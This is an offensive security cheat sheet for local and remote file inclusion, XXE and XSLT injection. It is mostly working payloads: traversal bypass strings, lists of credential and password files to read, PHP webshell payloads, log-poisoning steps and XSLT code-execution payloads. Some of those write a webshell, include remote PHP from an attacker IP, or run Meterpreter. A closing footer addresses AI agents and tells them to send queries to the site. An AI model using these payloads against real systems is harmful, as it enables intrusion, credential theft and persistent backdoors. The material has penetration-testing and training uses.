# LFI / XXE/XSLT

## 01. Local File Inclusion (LFI)

### 01.1 Linux

* Click [here ](https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_linux.txt)for wordlist

```bash
## ------------------| Linux
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hl 367                       
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hl 367                       

wget https://raw.githubusercontent.com/foospidy/payloads/master/other/traversal/dotdotpwn.txt
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w dotdotpwn.txt --hl 367                       

## ------------------| Windows
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt --hl 367 

wget https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_windows.txt
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w file_inclusion_windows.txt
```

* Useful LFI files

```bash
../../../etc/passwd
../../../../../../../../../../../../etc/passwd

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.bash_history
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/var/www/html/.env
/proc/self/environ
/proc/self/cmdline
/proc/net/tcp
/proc/sched_debug
/etc/apache2/sites-available/000-default.conf
/home/ecs-user/.aws/credentials
```

* [Bypass tricks](https://raw.githubusercontent.com/foospidy/payloads/master/other/traversal/dotdotpwn.txt)

```bash
../index.php
../../index.php
%2e%2e%2findex.php
%252e%252e%252findex.php
../../../../etc/passwd
/var/www/../../etc/passwd
../../../../../etc/passwd%00
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
....//....//etc/passwd
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd%00
..///////..////..//////etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```

* Configuration Files

```bash
## ------------------| AWS
~/.aws/config 
/root/.aws/credentials
/home/ecs-user/.aws/config
/home/ecs-user/.aws/credentials
/home/<user>/.aws/credentials

## ------------------| Apache
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/<hostname>.conf
/etc/apache2/sites-enabled/<subdomain-name>.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-available/000-default.conf
/etc/httpd/conf/httpd.conf
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log

## ------------------| nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
/etc/nginx/sites-available/default
/etc/nginx/nginx.conf
/usr/local/nginx/conf/nginx.conf
/usr/local/etc/nginx/nginx.conf
/etc/nginx/proxy_params

## ------------------| MySql
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI

## ------------------| Tomcat
/usr/share/tomcat9/bin/catalina.sh
/usr/share/tomcat9/etc/tomcat-users.xml
/var/lib/tomcat9/conf/tomcat-users.xml
/var/lib/tomcat9/conf/server.xml
/var/lib/tomcat9/conf/web.xml
/var/lib/tomcat9/conf/

## ------------------| Microsoft IIS (ASP .NET)
/web.config
../web.config
..././web.config 

## ------------------| Spring Boot 
application.properties
application.yml
config/application.properties
config/application.yml
src/main/java/main.java
pom.xml
static/index.html
mvnw
mvnw.cmd

## ------------------| Ruby on Rails
/Rakefile
/config/routes.rb
/config/database.yml
/config/application.rb
/storage/development.sqlite3
/config/environments/test.rb
/config/environments/production.rb
/config/environments/development.rb

## ------------------| Laravel
/var/www/html/.env
/var/www/html/index.php
/var/www/html/config/api_setting.php
/var/www/html/storage/logs/laravel.log
/var/www/html/app/Admin/routes.php

## ------------------| Flask 
app.py
/app/app.py
config.py
/app/config.py
models.py
forms.py
utils.py
templates/index.html
static/script.js
requirements.txt

## ------------------| Webroot locations
/var/www/html/            # Apache	
/usr/local/nginx/html/    # Nginx	
c:\inetpub\wwwroot\       # IIS	
C:\xampp\htdocs\          # XAMPP
C:\wamp\www\              # WAMP
```

* Log Files

```bash
## ------------------| Generic:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.log

## ------------------| Red Hat/CentOS/Fedora Linux   
/var/log/httpd/access_log

## ------------------| Debian/Ubuntu   
/var/log/apache2/access.log

## ------------------| FreeBSD   
/var/log/httpd-access.log

## ------------------| XAMPP
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log
```

* Download running binary file.

<pre class="language-bash"><code class="lang-bash">## ------------------| Identify runnable tasks and copy the PID 
<strong>/proc/sched_debug
</strong>/proc/self/cmdline

## ------------------| Get the location for runnable process and download the file
<strong>/proc/&#x3C;PID>/cmdline
</strong><strong>
</strong>## ------------------| Get linked libs
/proc/&#x3C;PID>/maps

## ------------------| Get running process
/proc/sched_debug
</code></pre>

### 01.2 Windows

```bash
## ------------------| SMB?
sudo responder -I tun0 
//<IP>/hello/world
\\<IP>\hello\world
```

* Click [here ](https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_windows.txt)for wordlist
* File Paths

```bash
wget https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_windows.txt

..././Windows/win.ini
/Windows/win.ini
/windows/system32/license.rtf
/Windows/System32/drivers/etc/hosts
/Windows/debug/NetSetup.log
/Users/Administrator/NTUser.dat
/Documents and Settings/Administrator/NTUser.dat
/apache/logs/access.log
/apache/logs/error.log
/apache/php/php.ini
/boot.ini
/inetpub/wwwroot/global.asa
/MySQL/data/hostname.err
/MySQL/data/mysql.err
/MySQL/data/mysql.log
/MySQL/my.cnf
/MySQL/my.ini
/php4/php.ini
/php5/php.ini
/php/php.ini
/Program Files/Apache Group/Apache2/conf/httpd.conf
/Program Files/Apache Group/Apache/conf/httpd.conf
/Program Files/Apache Group/Apache/logs/access.log
/Program Files/Apache Group/Apache/logs/error.log
/Program Files/FileZilla Server/FileZilla Server.xml
/Program Files/MySQL/data/hostname.err
/Program Files/MySQL/data/mysql-bin.log
/Program Files/MySQL/data/mysql.err
/Program Files/MySQL/data/mysql.log
/Program Files/MySQL/my.ini
/Program Files/MySQL/my.cnf
/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
/Program Files/MySQL/MySQL Server 5.0/my.cnf
/Program Files/MySQL/MySQL Server 5.0/my.ini
/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
/Program Files (x86)/Apache Group/Apache/conf/access.log
/Program Files (x86)/Apache Group/Apache/conf/error.log
/Program Files (x86)/FileZilla Server/FileZilla Server.xml
/Program Files (x86)/xampp/apache/conf/httpd.conf
/WINDOWS/php.ini /WINDOWS/Repair/SAM
/Windows/repair/system /Windows/repair/software
/Windows/repair/security
/WINDOWS/System32/drivers/etc/hosts
/WINNT/php.ini
/WINNT/win.ini
/xampp/password
/xampp/tomcat/conf/tomcat-users.xml
/xampp/htdocs/index.php
/xampp/apache/conf/httpd.conf
/xampp/apache/bin/php.ini
/xampp/phpMyAdmin/config.inc.php
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log
/Windows/Panther/Unattend/Unattended.xml
/Windows/Panther/Unattended.xml
/Windows/system32/config/AppEvent.Evt
/Windows/system32/config/SecEvent.Evt
/Windows/system32/config/default.sav
/Windows/system32/config/security.sav
/Windows/system32/config/software.sav
/Windows/system32/config/system.sav
/Windows/system32/config/regback/default
/Windows/system32/config/regback/sam
/Windows/system32/config/regback/security
/Windows/system32/config/regback/system
/Windows/system32/config/regback/software
/Program Files/MySQL/MySQL Server 5.1/my.ini
/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
/Windows/System32/inetsrv/config/applicationHost.config
/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
```

### 01.3 Wrappers & Filters

```bash
## ------------------| Basic
?page=data:text/plain,h4rithd
?page=data:text/plain,<?php system($_GET['cmd']); ?>
?page=data:text/plain,<?php echo shell_exec("whoami"); ?>

## ------------------| Base64 and rot13
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://FilTer/convert.base64-encode/resource=index.php

## ------------------| zip://
# echo "<pre><?php system(\$_GET['cmd']); ?></pre>" > payload.php  
# zip payload.zip payload.php
?page=zip://shell.zip/payload.php&cmd=whoami
?page=phar://shell.zip/payload.php&cmd=whoami
?page=zip://shell.zip%23payload.php&cmd=whoami
### you can rename it to jpg file as well, 
# mv payload.zip shell.jpg
?page=zip://shell.jpg/payload.php&cmd=whoami
?page=phar://shell.jpg/payload.php&cmd=whoami
?page=zip://shell.jpg%23payload.php&cmd=whoami

## ------------------| zlib 
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
## To read 
# php -a #Starts a php console
# readfile('php://filter/zlib.inflate/resource=test.deflated');

## ------------------| data://
?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
?page=data://text/plain,<?php phpinfo(); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
# NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

## ------------------| expect://
?page=expect://id
?page=expect://ls

## ------------------| input://
?page=php://input
# POST DATA: <?php system('id'); ?>
```

### 01.4 LFI to RCEs

`include=('$file')`

* PHP Gadgets (New🔥)

```bash
## ------------------| 
wget https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py
python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'
```

* Log Poisoning

```bash
## ------------------| Basic Payload
<?php phpinfo(); ?>
<?php system($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>'; ?>

## ------------------| Send for apache
nc <IP> 80
...enter..payload..here!...

## Your session/auth cookies or any type of session information store on
## ------------------| Linux 
/tmp/sess_
/var/tmp/sess_
/var/lib/php/sessions/sess_
/proc/self/environ/ ## <-- use for User-Agent: <?=phpinfo(); ?>
/var/log/auth.log ## <-- use ssh '<?php system($_REQUEST['cmd']); ?>'@IP        
/var/log/vsftpd.log ## <-- use above payload as username with ftp  
var/log/apache2/access.log ## <-- use it from nc(BEST WAY!!) or use it as http://IP/<?php phpinfo(); ?>
 
## ------------------| Windows
\Windows\TEMP\sess_<session_id> 
c:\xampp\apache\logs\access.log&cmd=ipconfig 
```

### 01.5 Tricks

* phpinfo() (file\_uploads = on)

```bash
# Download this script
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py
```

{% embed url="<https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s>" %}

### 01.6 LFI with python

* Click [`here`](https://docs.h4rithd.com/languages/python#02.-lfi-with-python)!

## 02. Remote File Inclusion

`allow_url_include`

```bash
nc -lvnp 80

## ------------------| Create payload file (php/txt)
<?php phpinfo(); ?>
<?php system($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>'; ?>

## ------------------| Execute
### move file to /var/www/html and start apache sever
### execute
=http://<IP>/file.txt
```

## 03. XML external entity (XXE) injection

* Common payloads

```bash
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
    <productId>
        &xxe;
    </productId>
</stockCheck>
```

* Filters

```bash
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php"> ]>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/hosts.php">  
```

## [04. XSLT Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSLT%20Injection/README.md)

```bash
## ------------------| Read Files
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/fruits">
    <xsl:copy-of select="document('http://172.16.132.1:25')"/>
    <xsl:copy-of select="document('/etc/passwd')"/>
    <xsl:copy-of select="document('file:///c:/winnt/win.ini')"/>
    Fruits:
     <!-- Loop for each fruit -->
    <xsl:for-each select="fruit">
      <!-- Print name: description -->
      - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
    </xsl:for-each>
  </xsl:template>
</xsl:stylesheet>

## ------------------| Write Files
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:exploit="http://exslt.org/common" 
  extension-element-prefixes="exploit"
  version="1.0">
  <xsl:template match="/">
    <exploit:document href="evil.txt" method="text">
      Hello World!
    </exploit:document>
  </xsl:template>
</xsl:stylesheet>

## ------------------| Remote Code Execution with PHP Wrapper
#### readfile
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:value-of select="php:function('readfile','index.php')" />
</body>
</html>
#### scandir
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
  <xsl:template match="/">
    <xsl:value-of name="assert" select="php:function('scandir', '.')"/>
  </xsl:template>
</xsl:stylesheet>
#### assert
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
  <xsl:variable name="payload">
    include("http://10.10.10.10/test.php")
  </xsl:variable>
  <xsl:variable name="include" select="php:function('assert',$payload)"/>
</body>
</html>
#### PHP meterpreter
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
  <xsl:template match="/">
    <xsl:variable name="eval">
      eval(base64_decode('Base64-encoded Meterpreter code'))
    </xsl:variable>
    <xsl:variable name="preg" select="php:function('preg_replace', '/.*/e', $eval, '')"/>
  </xsl:template>
</xsl:stylesheet>
#### remote php file
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
  <xsl:template match="/">
    <xsl:value-of select="php:function('file_put_contents','/var/www/webshell.php','&lt;?php echo system($_GET[&quot;command&quot;]); ?&gt;')" />
  </xsl:template>
</xsl:stylesheet>

## ------------------| Remote Code Execution with Java
  <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
    <xsl:template match="/">
      <xsl:variable name="rtobject" select="rt:getRuntime()"/>
      <xsl:variable name="process" select="rt:exec($rtobject,'ls')"/>
      <xsl:variable name="processString" select="ob:toString($process)"/>
      <xsl:value-of select="$processString"/>
    </xsl:template>
  </xsl:stylesheet>

## ------------------| Remote Code Execution with Native .NET
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:App="http://www.tempuri.org/App">
    <msxsl:script implements-prefix="App" language="C#">
      <![CDATA[
        public string ToShortDateString(string date)
          {
              System.Diagnostics.Process.Start("cmd.exe");
              return "01/01/2001";
          }
      ]]>
    </msxsl:script>
    <xsl:template match="ArrayOfTest">
      <TABLE>
        <xsl:for-each select="Test">
          <TR>
          <TD>
            <xsl:value-of select="App:ToShortDateString(TestDate)" />
          </TD>
          </TR>
        </xsl:for-each>
      </TABLE>
    </xsl:template>
</xsl:stylesheet>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.h4rithd.com/owasp-10/lfi-xxe.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.